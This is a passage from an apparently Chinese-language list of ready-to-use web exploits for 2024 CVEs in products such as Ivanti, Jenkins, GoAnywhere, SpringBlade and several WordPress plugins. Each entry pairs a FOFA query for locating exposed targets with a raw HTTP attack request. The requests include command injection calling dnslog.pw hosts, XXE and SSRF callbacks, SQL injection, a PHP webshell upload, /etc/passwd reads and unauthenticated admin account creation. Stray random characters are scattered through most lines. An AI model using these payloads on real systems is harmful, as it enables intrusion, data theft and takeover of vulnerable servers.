8 {2 x: E( I* E( ]Content-Length: 1218 b& y: o8 Y4 Q8 ?
Accept: */*, g+ ~! r1 B* m8 F7 Z
Accept-Encoding: gzip, deflate
: c5 l. D' g7 u* v. m! vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. m* ~& z" z/ B5 A6 rContent-Type: application/x-www-form-urlencoded; charset=UTF-8
( r, N! r# |1 _3 e$ T5 o+ GX-Requested-With: XMLHttpRequest! h5 D8 E! V: a' a: d0 c2 t
9 H9 ~ N t, E$ x( y9 I# O+ kid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B6 s# C+ H n: P0 j6 q m
# b7 B9 A: e1 F4 ?9 a7 z
' \8 K& y4 T4 v8 p! T1 u99. Ncast盈可视高清智能录播系统busiFacade RCE
( ` w/ i# Q2 o8 W3 ^CVE-2024-0305+ i( K+ |5 m6 ~' {) O% P% \ \, s
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
2 M6 r; ^3 c2 z% CPOST /classes/common/busiFacade.php HTTP/1.1
) \$ [/ N# S$ }4 M6 y2 g9 A" ~& e/ IHost: 192.168.40.130:8080
, A8 @! F, M" Y6 P* pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- {5 L4 y4 [. K
Connection: close* k# r2 {" P& M: e8 R7 d
Content-Length: 154
; i. Y6 d$ ~' x# U2 M: o# uAccept: */*3 |0 ?! G; n& J/ o- a
Accept-Encoding: gzip, deflate, j M& o: \6 k* C9 ]. m4 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
~. ^/ @6 Y' k! y S" XContent-Type: application/x-www-form-urlencoded; charset=UTF-85 q" Z; e, Q% f% y+ b% _7 x" C
X-Requested-With: XMLHttpRequest4 R' |/ O" o. Z+ H- T
* [) @- G* I* K, N' F. q3 o9 x
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D' p' J- K; V$ _; z; u
# t2 K( V! x( c- i! [4 X5 d& L2 Z/ G+ n, z9 t5 s/ j, |
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传) X5 T0 s2 b* C9 i, H! B' x% d) }
CVE-2024-0352- d& a9 ^& A) k0 a2 u
FOFA:icon_hash="874152924"5 v- I2 {/ s7 O, z. D% x
POST /api/file/formimage HTTP/1.1
* v: l1 K- S' N$ L3 d& K, \: ^Host: 192.168.40.130$ y& j, W7 {5 I9 m; W; T
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36- N1 T E' F7 b# `# Z
Connection: close* c; ?6 N4 m: P4 q, z
Content-Length: 201
- ~$ _. ?* Y; @, x: L0 Y! `Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
, J# V8 L4 Z1 e$ h" V& `Accept-Encoding: gzip
7 @, k5 V8 x8 w) P( @; j0 I, {' X" I% v1 u
------WebKitFormBoundarygcflwtei
; R1 w$ g2 E& {- b2 R2 oContent-Disposition: form-data; name="file";filename="IE4MGP.php"* c* U% y# ~4 q* Q0 a
Content-Type: application/x-php
8 s* k7 K+ T8 z! ^. `( y7 _7 b4 A7 A( \/ u8 ^
2ayyhRXiAsKXL8olvF5s4qqyI2O& X4 |+ \9 P& ~
------WebKitFormBoundarygcflwtei--
' `* ?1 n( p# J4 b( ~+ w6 G `- ^( ^2 ~/ B- o* E% ?$ v$ S& [
* X/ S. {2 R& l* Z$ e# I- U
101. ivanti policy secure-22.6命令注入) O! q5 P+ v" R; G+ n1 o
CVE-2024-21887
6 b, y u; N2 CFOFA:body="welcome.cgi?p=logo"
# B! f! U8 f6 m4 x YGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.17 D* V1 q7 V! g8 D0 B2 C
Host: x.x.x.xx.x.x.x
$ |: H; \2 j- g% M- N2 t3 ]2 K3 eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; x" C& t% V0 I% i* F4 }
Connection: close
5 C) v% I% t$ U! e/ MAccept-Encoding: gzip
* {5 J) r ?9 k5 q; G) J- `9 N5 D9 ]! Q% x0 M( q
! e" w, ] F4 M" y$ e# z, l) t( U102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
- K& K2 ?( u5 @4 f' C# n9 {8 jCVE-2024-21893
- w. x3 d$ e" l7 }FOFA:body="welcome.cgi?p=logo"
* w$ l+ M$ h- APOST /dana-ws/saml20.ws HTTP/1.17 o" l5 F/ m* b: ~) n. x
Host: x.x.x.x
9 j8 n/ E+ Z* P6 ?2 U% CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# {/ p7 k" s% H
Connection: close1 C( Y7 \+ A) O1 x1 b
Content-Length: 792' @' D3 u0 X( B
Accept-Encoding: gzip' s2 O" j: M1 {, U9 N$ P, a
: L; q; {# ?! z" y# N% ?
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
4 h1 q- ?1 _( ^$ H5 b5 Q0 \
: X0 N1 J! l! N7 p9 q; e- ~103. Ivanti Pulse Connect Secure VPN XXE
; N6 Y5 J% o+ i, V; M. t6 }3 d dCVE-2024-220244 }4 l" t y. y' D- S* M$ u
FOFA:body="welcome.cgi?p=logo"
) e. R1 @& v0 m/ fPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
0 u7 Q$ ]; E" BHost: 192.168.40.130:111
) ^' |5 m2 R: @9 dUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
0 \$ V& _# j' V( K) @$ l0 t2 NConnection: close
1 a4 J; s4 Z& P. SContent-Length: 204
' `; J0 b% `- l8 [! [( [Content-Type: application/x-www-form-urlencoded3 Z) x# i: J+ I: N' t1 W7 A& [
Accept-Encoding: gzip* J4 I( x( [& e* h! z: X
5 Z$ J. S) M" @- ^! D, Q2 S2 m. Z4 p) _
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
! `5 Y' S n/ [4 Y0 @4 D2 ~0 ]7 B1 [% T! ?
7 V' r9 Y, J- F其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
, u+ H) ^/ _7 B/ R<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
# @! J) O' `' T r) H/ Y4 p8 Q+ |4 ^" V6 X. M% N, W- @4 s+ H7 O
/ ]7 N3 E9 v* E; E0 o2 ]8 Q
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露8 E" o3 U, K& u. A& q
CVE-2024-0569* J6 l" n& m+ M% s& {; g- O
FOFA:title="TOTOLINK"
! L, U5 x: k; L7 h4 |: G) w4 q( ?POST /cgi-bin/cstecgi.cgi HTTP/1.1) g. ?8 X! m5 M# i9 J, m
Host:192.168.0.1' b2 D3 F3 d% I% t4 I q
Content-Length:411 {! ^2 h2 m1 k$ ?9 @' y
Accept:application/json,text/javascript,*/*;q=0.01, @2 @/ v1 R M* m# C& d
X-Requested-with: XMLHttpRequest% f, P+ x8 d$ n" l0 j9 L. e2 Y& A
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36+ O( P8 P* h/ Z9 n
Content-Type: application/x-www-form-urlencoded:charset=UTF-8- x$ j& |" P+ w$ c
Origin: http://192.168.0.10 Q, J9 I3 L) V7 V' W; j2 k! j
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
7 X7 r* J& T" J+ X2 hAccept-Encoding:gzip,deflate5 O4 J* Q7 W2 d5 h
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
+ u' T5 S8 Y& e1 EConnection:close9 O3 H& {. M6 F; r
# A- v& z# O# J) o{
/ d, F3 D9 G5 t: m$ x& z2 F& d"topicurl":"getSysStatusCfg",
4 m9 s- S) B; z8 O) H"token":""
/ g/ Y+ ?! D* a% S1 H4 Z}
6 ~' N: j+ R8 _; u, i6 i9 ?4 D. ~0 p9 d
105. SpringBlade v3.2.0 export-user SQL 注入' G+ ` \, k% ^/ w% `# [
FOFA:body="https://bladex.vip"
; R. l# h; s( \! Nhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
- U( `0 D; A) o! T/ S8 K4 j' S- W7 n. k# q& A' z
106. SpringBlade dict-biz/list SQL 注入; M% v8 V7 z' k
FOFA:body="Saber 将不能正常工作"
% `4 e0 B3 Z4 D/ M! Z8 T$ O) ^GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
& @ P" P6 d. [Host: your-ip
: {8 i' S6 K" X' e- l* m2 |8 \# CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 A& r! i4 K: l* ], j' V; s
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A2 q# z. Y$ l0 q2 x
Accept-Encoding: gzip, deflate s$ [7 O: L5 @0 s0 j% @
Accept-Language: zh-CN,zh;q=0.9* `, P1 w# \9 u# r6 F j
Connection: close. t& M( \: J7 K- H; O# `4 Q
: ~4 J. [+ A: Z/ G2 @
! ]% D1 B: C! a! u- s107. SpringBlade tenant/list SQL 注入: x) W/ j# r# U N4 B8 c
FOFA:body="https://bladex.vip"$ a+ h, G4 F7 ^: Q
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.14 U9 Z2 {" S( H0 @9 m( l
Host: your-ip
0 L( k! ~+ {% uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* J( F6 A/ O6 b& N' S
Blade-Auth:替换为自己的5 I; ?6 L5 k( b9 O; h/ S. b
Connection: close
4 I7 F/ E6 _ K3 |6 J$ K
6 K# m3 y( o; h, X9 i$ }1 ]* R0 k# S% q7 }7 {( r
108. D-Tale 3.9.0 SSRF
, C) J6 B& W; b+ S' k7 Y+ p2 }" {CVE-2024-21642
2 p4 K; E8 I/ @) FFOFA:"dtale/static/images/favicon.png"9 ?+ E( {7 [9 G" [
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
2 @1 \ r/ a5 @! l* M" ^9 H# p& F" wHost: your-ip
& I. v! T8 `$ f1 S2 |Accept: application/json, text/plain, */*
' B# g N; G( Z }3 t$ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 F# p6 K, b( @: K7 G, `7 Z: d
Accept-Encoding: gzip, deflate
5 W- H1 Q# N3 k- T7 B0 Y% v2 rAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 R% H5 `+ v- p/ ^Connection: close
7 R5 \0 @8 S7 c6 Z s0 [0 M* q" z2 H- L3 c) N$ b
8 d) |2 e) f2 U% S/ Q* t( h4 {, d4 s
109. Jenkins CLI 任意文件读取- _* v- U+ g1 n# K
CVE-2024-23897
. U$ O9 b1 I: Y3 b( m ^FOFA:header="X-Jenkins"
. i2 {* m8 u4 i; SPOST /cli?remoting=false HTTP/1.1
* n% v$ n b7 @. HHost:
: S6 J1 N, p9 |; Y, n' K7 nContent-type: application/octet-stream
/ R8 T6 [7 i. k2 HSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
/ j2 h. P% S. qSide: upload
% o! G% ^4 X1 Y. k6 m1 N9 `Connection: keep-alive
; [: W! R2 D: B* J5 pContent-Length: 1633 f/ n- H' G. _5 x" ?
2 d% x7 J* w4 L+ U0 z. F
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'! E( ~5 {4 A5 K. T
: ?7 k) K5 y4 |) _/ D8 }& z) j8 a" k% @9 A1 n/ A$ p! J
POST /cli?remoting=false HTTP/1.1
$ [$ v% `/ ]4 \( a( qHost:
) `# W& e/ ^. S2 \& b0 _$ LSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92+ k9 M( O# ]; s. A y# H
download
6 j0 a3 ~8 c( y- N3 S6 m7 UContent-Type: application/x-www-form-urlencoded
% n. U# ?2 Z& f1 E$ nContent-Length: 0
3 q1 J' j; N+ s! C2 K. E w8 {# L: o+ A* w3 Y
. y H) D. P; p. G) `
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" L4 Z& T, }) p- c# c5 ^
java -jar jenkins-cli.jar help
. e0 K9 v6 M8 R' P% l7 k" W[COMMAND]& K4 z$ M9 s. a1 U. T
Lists all the available commands or a detailed description of single command.) X: R* m, U- m
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)9 W6 {+ \+ D' c+ v8 `9 j
( i/ G' H8 C" k) G
! ?* D$ ^7 l; P7 p+ T
110. Goanywhere MFT 未授权创建管理员
) E$ T8 @% H+ r/ h+ }5 f% Z, tCVE-2024-0204
/ O5 l) E& p# ~, e/ M! w; WFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
( f) ]% ?1 ?6 c& vGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1) j) R6 T* n F' @0 r
Host: 192.168.40.130:8000
8 u6 c1 }' ~# `$ \6 ^! g- YUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.365 o3 q$ P l4 F$ N9 I
Connection: close
$ J3 X4 T4 R& z7 ^2 GAccept: */* k9 c- d0 w; P+ i& U7 U
Accept-Language: en, B4 M8 n0 }1 `2 {1 p% E
Accept-Encoding: gzip
3 Z8 Y5 z" `9 Z0 i
! Z7 l* q. y; W j- T( s2 ~
2 y( k4 V- X# [111. WordPress Plugin HTML5 Video Player SQL注入! H. e* Y) p- n9 B: m
CVE-2024-1061! N2 b% n t9 }% Z) @
FOFA:"wordpress" && body="html5-video-player"5 Y! k; q, d X9 j; g; r, H; ]1 E* H
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1) N/ B! P+ O, W3 O
Host: 192.168.40.130:112& r5 v% h: q N. g; ~# c* l
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' w! [# t8 t, ?2 E9 S6 ?
Connection: close
! M( R4 B+ Q( }" [1 HAccept: */*" g. F* ?3 f% d d$ c ^
Accept-Language: en
8 j. m& Y) A. S( H! }; B- SAccept-Encoding: gzip
% R( w7 G8 Q8 Q; X/ h5 j8 H2 l# k/ w! C1 t) x
4 L0 [2 w: J7 `8 r' O) q
112. WordPress Plugin NotificationX SQL 注入: _, G" n" h0 _3 E9 k1 N
CVE-2024-1698! k2 Z$ A3 F9 [% S& u2 i
FOFA:body="/wp-content/plugins/notificationx". B7 n; N% m$ U% E b* o$ c; C! y: b
POST /wp-json/notificationx/v1/analytics HTTP/1.16 n, E* B& ]0 ~; R% F0 }
Host: {{Hostname}}! K" V0 o$ T p3 R8 U% U
Content-Type: application/json# U; h5 J" S. y8 ?8 J( c+ s6 O
+ O. U, T8 l) ~* a! L1 R
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
- q' f) P X5 O+ {% j
: R# s5 H8 L8 e9 Z) i) t$ \. W0 @$ ?2 @( |, h$ j% B8 D
113. WordPress Automatic 插件任意文件下载和SSRF
8 u- S$ d. Q+ G, H1 e; s7 t* dCVE-2024-279546 U. Z K& C7 P# {( @ B* g
FOFA:"/wp-content/plugins/wp-automatic"8 A4 G# Y; C4 @( }3 M q4 T
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
4 l2 _' W! I2 i2 K/ lHost: x.x.x.x4 l, ?& v, P2 ?
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
0 I+ k+ V+ ]. }* `Connection: close) W: }# A* ~' f4 Q
Accept: */*
; E* N/ A; b, ^* X' H. KAccept-Language: en
- t, {& Z, S/ z5 r# [Accept-Encoding: gzip
& @+ p& |. W3 U2 z( E+ Z- o. H
7 T( Y' x' d8 p2 I" F7 R* A7 q: z f; u; Z" W9 X# G0 i- a; n |
114. WordPress MasterStudy LMS插件 SQL注入/ `$ c( d4 L8 Q2 B5 {. v) w
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"( V* Z7 y' h( n
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
7 M+ S- S& q" g; [Host: your-ip6 ^7 }8 {. u# H2 U: }
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36# Z+ g" V: u; M# }$ O7 ^# }/ y+ D7 t
Accept-Charset: utf-87 o& C3 q! {- I( \
Accept-Encoding: gzip, deflate4 p1 m3 O1 E1 F- H% l
Connection: close
, l/ c" K q0 y/ @% v7 \. L% x5 z
9 r+ Q, H' S0 |0 E$ }" S
115. WordPress Bricks Builder <= 1.9.6 RCE
, P% O1 |+ z; j/ M2 [8 S) t( GCVE-2024-25600% v# c5 [4 t b6 q. n
FOFA: body="/wp-content/themes/bricks/"1 D0 p* p. s1 c. `" B
第一步,获取网站的nonce值* U" H- x+ {5 J3 O6 f
GET / HTTP/1.1
) c: l! L% y* r$ ~$ z1 D4 _+ cHost: x.x.x.x1 j# L' y& e! R. Z4 W$ I) M \6 V
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( y7 D5 k( v5 t5 g
Connection: close* u; O/ O) }1 K/ N/ [
Accept-Encoding: gzip
9 t/ u- T- B: f; ~+ X4 l0 j/ j- S5 R7 t
6 \( f( D2 X# `# Z& V第二步替换nonce值,执行命令7 w7 A7 A- D8 Q+ a
POST /wp-json/bricks/v1/render_element HTTP/1.1
6 u) ~" ~6 M0 ^! _6 OHost: x.x.x.x5 @4 N$ }+ |' Z: M( M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% l: G2 `) e) ^4 i( ZConnection: close. t+ `+ ^& O+ a( n! `4 ^
Content-Length: 356
6 ? d1 U# |& F( h9 M. [Content-Type: application/json
& @ l# R Z9 r4 j& fAccept-Encoding: gzip; ?) q' k, S/ Y! Y% [+ U% ?
2 m; o1 u$ k& S/ R9 }. Y
{1 v ?: Z2 Z) P6 O
"postId": "1",
! R3 O6 T" y( Q# {* j3 ?& a$ S, c "nonce": "第一步获得的值",8 X( Y4 a& y8 }( `# f5 v8 z% W
"element": {
# a4 c& p6 p; A8 }9 l" x9 X0 m "name": "container",1 N' M% a9 q- F) m, ^( ]4 Q
"settings": {2 Y" f0 X- g. w$ A }
"hasLoop": "true",
0 B" F8 H9 Z5 \, v# X "query": {0 |0 o$ I. m; b7 f: v3 c& {
"useQueryEditor": true,
! ^' Z1 @8 {3 ` "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
}3 ^ D0 s" ` "objectType": "post"
3 _6 y% r8 `) S/ K }8 f, b% R1 V3 Y0 K
}
8 r9 J4 Z. S" d/ d, i }
5 M2 a& g2 t8 T3 A* r. q" d. j}
/ p# _8 h. l( K/ t; m; R* d9 g |
% k* i7 U" [0 A+ ~& I116. wordpress js-support-ticket文件上传
3 t% @ x e; L" k+ C+ lFOFA:body="wp-content/plugins/js-support-ticket"
1 x% i0 g1 S5 n; `9 vPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.14 v" o% ?3 v* b- i' b: F3 s
Host:
' g6 z+ v2 a* c# a, }; J" O; x1 QContent-Type: multipart/form-data; boundary=--------7670991712 _5 b7 F. e0 C |
User-Agent: Mozilla/5.0
8 Z2 h2 W5 G) a* ?# b
; Y/ y" L' ]0 U. l+ r----------767099171
& Q2 k" l' T O, X, p/ v+ W" y) h0 eContent-Disposition: form-data; name="action"7 C& W+ G, Q* W! `0 h4 W
configuration_saveconfiguration
- z5 ^( m+ a8 \8 [2 M1 s----------767099171 ^ o( W7 V* c
Content-Disposition: form-data; name="form_request") @$ B0 i3 s/ s' `9 y6 y5 A
jssupportticket3 }9 g; T Z: Y& x( o* m0 }6 o
----------767099171: ~* q! B7 ]: ~8 E1 t" S6 M. j
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
! I: m4 i" A$ P6 \Content-Type: image/png
4 r- v8 u, @9 ?0 k k, _----------767099171--
, C. ~$ U& c; O1 Q: O: ]3 T# S) Q' P+ x/ p1 T9 ?$ h" |
T5 O* W7 @, Z* G2 T9 p117. WordPress LayerSlider插件SQL注入
- h1 }( W: u/ Q% h6 o1 l" rversion:7.9.11 – 7.10.0: s* ^! [- V1 V: A& i
FOFA:body="/wp-content/plugins/LayerSlider/"3 G4 D0 Y5 e- b0 C2 t2 o
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1% J& l. q# f4 B" J
Host: your-ip
7 _8 z8 a6 ?; s3 P" B5 {- W8 m& CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. j3 z: D' a: w6 t* W/ r0 u! M; v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' h" H. W7 R! ]) y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 T: p; [8 x* d8 E _# T
Accept-Encoding: gzip, deflate, br
* t/ x. o! J# KConnection: close
9 Z* P% n$ g, B8 A9 M0 I# VUpgrade-Insecure-Requests: 1. Y" l) x, }- M# Q3 q0 j8 b0 _5 S
$ H+ N' ^0 G/ G' ?2 n; N8 x
8 L+ i, i* z4 |1 m2 O$ ~+ a5 y( H118. 北京百绰智能S210管理平台uploadfile.php任意文件上传' A) y2 c2 |( T5 w% E$ |( v2 R
CVE-2024-0939
' F0 M9 o1 N( QFOFA:title="Smart管理平台"% p4 A' b- g) @ B
POST /Tool/uploadfile.php? HTTP/1.1# ?, S0 t1 ~# G3 k% P# F) D& g/ }
Host: 192.168.40.130:8443
8 b( k( u" w4 c& I# JCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8% q/ x! ]1 ]. z8 a. `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
9 h8 H9 r4 H( E' h% j0 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 d) u! Y" c$ G+ {% u5 O! Z+ A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 Q3 }9 s. k- u8 y$ x; b# vAccept-Encoding: gzip, deflate5 W* z& e7 b) Z3 F o
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
`' K5 E, W& \1 _$ R. m! |; m* oContent-Length: 405
' \7 }$ H+ f% }Origin: https://192.168.40.130:8443( w: B& Z# J4 ^' s2 B2 H+ j p
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
1 ^7 w- M- h2 {& d# k3 |+ UUpgrade-Insecure-Requests: 1
, ]/ x; Y7 _$ ~; N n( l7 {Sec-Fetch-Dest: document& G% m. Y- y" J- c2 e8 y3 f! _
Sec-Fetch-Mode: navigate
. _ T# y( b9 S/ ?Sec-Fetch-Site: same-origin* B& f, y9 U$ N* K' |
Sec-Fetch-User: ?1+ k P8 _* J& m. \+ b) a3 m
Te: trailers
( w2 R+ c8 S" n ^% IConnection: close5 Q- }* g5 L2 J# ~& ]( b2 ?
6 m' J2 X) V: I1 f! L-----------------------------13979701222747646634037182887
5 b- z2 u( {+ u: v# L9 r$ Z4 r( x( qContent-Disposition: form-data; name="file_upload"; filename="contents.php"5 m$ \9 V, h7 f6 o) c( A: ~
Content-Type: application/octet-stream
4 y6 Z3 z3 L) T, |1 ~8 R* m0 G% {7 t9 p2 d) ~; R/ T9 r. }( ?
<?php
H3 W6 i8 R3 a0 o# E) isystem($_POST["passwd"]);
7 s. w( T9 | y% R?>
; \0 ]+ M1 ^5 M-----------------------------13979701222747646634037182887
9 y( g2 e9 I8 s {) I+ |2 CContent-Disposition: form-data; name="txt_path"
8 U+ e/ u( ]0 K" Z2 D5 Z
% l& M" ^7 j' c. n6 |, l, a/home/src.php+ [# n7 v) e5 a1 G8 J# ]7 m
-----------------------------13979701222747646634037182887--
5 Z8 V& I9 C+ V( Y
2 q! I9 Q+ U1 p% b) K) H" j) a/ d% A5 @0 U4 Z. c
访问/home/src.php; d% h& S' D* q# D5 @
0 L/ k4 q; |* p" o- [" e119. 北京百绰智能S20后台sysmanageajax.php sql注入
' y4 \5 i% [6 R0 oCVE-2024-1254
4 W: K! i% s/ X) S& r, uFOFA:title="Smart管理平台"+ H9 {9 P/ u! N8 I# F" |
先登录进入系统,默认账号密码为admin/admin0 R6 K4 |) R3 p
POST /sysmanage/sysmanageajax.php HTTP/1.11
$ h* L5 x0 |% l: f+ rHost: x.x.x.x- h! e& }- y: |8 c3 l% l$ ? ?
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
! T. C& l3 z, v: e& dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
% H. o% N- |' i0 e1 Z6 Q' H( @Accept: */*5 p9 z3 V; g# m6 f8 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) K6 _0 ~$ g/ @6 i9 j2 U% F O
Accept-Encoding: gzip, deflate
) K# [2 f. E* r9 a S9 L) NContent-Type: application/x-www-form-urlencoded;
, j3 J' |# \: n8 w( i0 @Content-Length: 1092 \6 q0 X5 v# z4 O. l
Origin: https://58.18.133.60:8443
; D U8 S4 N& ^" o& `% H' i- Q" iReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php; h6 n s2 Q! o/ H. Y) z) |
Sec-Fetch-Dest: empty
